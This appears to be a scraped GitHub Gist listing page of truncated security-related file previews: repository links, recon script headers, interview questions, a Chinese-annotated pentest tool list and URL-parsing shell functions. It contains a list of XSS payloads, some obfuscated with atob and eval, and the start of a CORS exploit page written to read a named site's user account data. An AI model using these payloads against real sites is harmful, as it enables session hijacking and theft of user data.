- https://github.com/003random/003Recon
- https://github.com/0x09AL/RdpThief
- https://github.com/0x27/ssh_keyscanner
- https://github.com/0x4a0x72/pwnedless
- https://github.com/0x4D31/fatt
- https://github.com/0x4D31/honeyLambda
- https://github.com/0x6470/bitwarden2hashcat
- https://github.com/0x6d69636b/windows_hardening
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ | |
| ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ | |
| ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ | |
| ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ | |
| ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ | |
| ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ | |
| @intx0x80 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| bash caithem.sh | |
| RED=$(tput setaf 1) | |
| GREEN=$(tput setaf 2) | |
| BLUE=$(tput setaf 4) | |
| RESET=$(tput sgr0) | |
| AMASS_VERSION=3.8.2 | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. What is information security and how is it achieved? | |
| 2. What are the core principles of information security? | |
| 3. What is non-repudiation (as it applies to IT security)? | |
| 4. What is the relationship between information security and data availability? | |
| 5. What is a security policy and why do we need one? | |
| 6. What is the difference between logical and physical security? Can you give an example of both? | |
| 7. What’s an acceptable level of risk? | |
| 8. What are the most common types of attacks that threaten enterprise data security? | |
| 9. What is the difference between a threat and a vulnerability? | |
| 10. Can you give me an example of common security vulnerabilities? |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| XSS PAYLOADS - @OFJAAAH | |
| : \');confirm(1);// | |
| <x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337` | |
| <script>prompt(1)</script> | |
| <script>confirm(1)</script> | |
| <script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script> | |
| <script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script> | |
| <script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script> |
We can't make this file beautiful and searchable because it's too large.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pattern,cnt | |
| ^,1657 | |
| -$,376 | |
| --,355 | |
| root.*/file.*\n,348 | |
| (?m)^hello world,338 | |
| \s+,296 | |
| \s*,278 | |
| ^[a-z],275 | |
| [cg]pu,245 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - PadBuster: | |
| - Padding Oracle attacks 自动化脚本 | |
| - https://github.com/AonCyberLabs/PadBuster | |
| - perl | |
| - bettercap: | |
| - 一个非常强大、灵活可移植的中间人攻击框架,它具有跨平台、轻量级以及模块化等优点,在渗透测试过程中能够非常好的进行中间人测试 | |
| - https://github.com/bettercap/bettercap | |
| - go | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <button type='button' onclick='cors()'>CORS</button> | |
| <p id='demo'></p> | |
| <script> | |
| function cors() { | |
| var xhttp = new XMLHttpRequest(); | |
| xhttp.onreadystatechange = function() { | |
| if (this.readyState == 4 && this.status == 200) { | |
| var a = this.responseText; // Sensitive data from niche.co about user account |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| host `echo https://pass:user@abracadabra-mms.starbucks.com:2996/utils/|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` | |
| function ohost { | |
| host `echo $1|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` | |
| } | |
| function ohosts { | |
| while read u; do host `echo $u|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1`; done < $1 | |
| } |
NewerOlder
